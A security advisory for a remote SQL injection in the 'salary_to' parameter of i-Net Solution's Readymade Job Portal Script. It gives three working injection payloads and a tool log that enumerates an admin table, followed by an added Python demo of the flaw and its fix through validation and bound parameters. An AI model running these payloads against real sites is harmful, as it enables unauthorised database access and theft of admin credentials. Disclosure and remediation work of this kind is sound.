Readymade Job Portal Script SQL Injection
Readymade Job Portal Script suffers from a remote SQL injection vulnerability. The researcher requested version information from the vendor while reporting the vulnerability but the company has been unresponsive.
Author    : CraCkEr
Website   : i-netsolution.com
Vendor    : i-Net Solution
Software  : Readymade Job Portal Script
Vuln Type : Remote SQL Injection
Method    : GET
Impact    : Database Access

Job Portal is a website that serves as a bridge between employers and job seekers.

Release Notes:
Typically used for remotely exploitable vulnerabilities that can lead to system compromise.
© CraCkEr 2022

GET parameter 'salary_to' is vulnerable.

---
Parameter: salary_to (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: search=&salary_from=222&salary_to=333) AND 3040=3040 AND (4873=4873

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: search=&salary_from=222&salary_to=333) AND (SELECT 3022 FROM(SELECT COUNT(*),CONCAT(0x71706a7671,(SELECT (ELT(3022=3022,1))),0x7162716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (1802=1802

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=&salary_from=222&salary_to=333) AND (SELECT 5992 FROM (SELECT(SLEEP(10)))wrGn) AND (8437=8437
---

[+] Starting the Attack

[INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0 (MariaDB fork)

[INFO] fetching current database
current database: 'theminsall_jobportal_db'

[INFO] fetching tables for database: 'theminsall_jobportal_db'
Database: theminsall_jobportal_db
[72 tables]

[INFO] fetching columns for table 'admins' in database 'theminsall_jobportal_db'
Database: theminsall_jobportal_db
Table: admins
[8 columns]
+----------------+------------------+
| Column         | Type             |
+----------------+------------------+
| created_at     | timestamp        |
| email          | varchar(191)     |
| id             | int(10) unsigned |
| name           | varchar(191)     |
| password       | varchar(191)     |
| remember_token | varchar(100)     |
| role_id        | int(11)          |
| updated_at     | timestamp        |
+----------------+------------------+

[INFO] fetching entries of column(s) 'email,id,name,password' for table 'admins' in database 'theminsall_jobportal_db'
Database: theminsall_jobportal_db
Table: admins
[3 entries]

Possible Algorithms: bcrypt $2*$, Blowfish (Unix)

[-] Done
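
Added example (not part of the original advisory and not the vendor's code): the reported payloads close a parenthesis right after 333, which implies salary_to is concatenated unquoted into a bracketed numeric condition. The sketch below assumes that query shape and a hypothetical jobs schema, with sqlite3 standing in for MySQL so it runs offline, and shows integer validation plus bound parameters rejecting the advisory's boolean-based value.

```python
import sqlite3

# Payload value quoted from the advisory's boolean-based entry for salary_to.
ADVISORY_VALUE = "333) AND 3040=3040 AND (4873=4873"

def make_db():
    # Constructed sample rows; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE jobs (id INTEGER PRIMARY KEY, title TEXT,"
               " salary_from INTEGER, salary_to INTEGER)")
    db.executemany(
        "INSERT INTO jobs (title, salary_from, salary_to) VALUES (?, ?, ?)",
        [("Clerk", 250, 300), ("Analyst", 240, 320), ("Director", 900, 1500)])
    return db

def search_vulnerable(db, salary_from, salary_to):
    # Assumed flaw: raw GET strings concatenated into a parenthesised numeric
    # condition, so a ")" in the value closes the group and the rest is SQL.
    sql = ("SELECT title FROM jobs WHERE (salary_from >= " + salary_from +
           " AND salary_to <= " + salary_to + ") ORDER BY id")
    return [row[0] for row in db.execute(sql)]

def parse_salary(raw, upper=10_000_000):
    # Allow-list check: ASCII digits only, then a range bound.
    if not (raw.isascii() and raw.isdigit()):
        raise ValueError("salary must be a non-negative integer")
    value = int(raw)
    if value > upper:
        raise ValueError("salary out of range")
    return value

def search_hardened(db, salary_from, salary_to):
    # Validate, then bind: values travel separately from the SQL text.
    low, high = parse_salary(salary_from), parse_salary(salary_to)
    sql = ("SELECT title FROM jobs"
           " WHERE (salary_from >= ? AND salary_to <= ?) ORDER BY id")
    return [row[0] for row in db.execute(sql, (low, high))]

def is_rejected(db, salary_to):
    try:
        search_hardened(db, "222", salary_to)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    print(search_vulnerable(db, "222", ADVISORY_VALUE), is_rejected(db, ADVISORY_VALUE))
```

The vulnerable function runs the advisory's value without a syntax error, which is the sign that the input was parsed as SQL rather than as a number. In the application's own stack the equivalent fix is an integer validation rule on salary_from and salary_to together with a prepared statement.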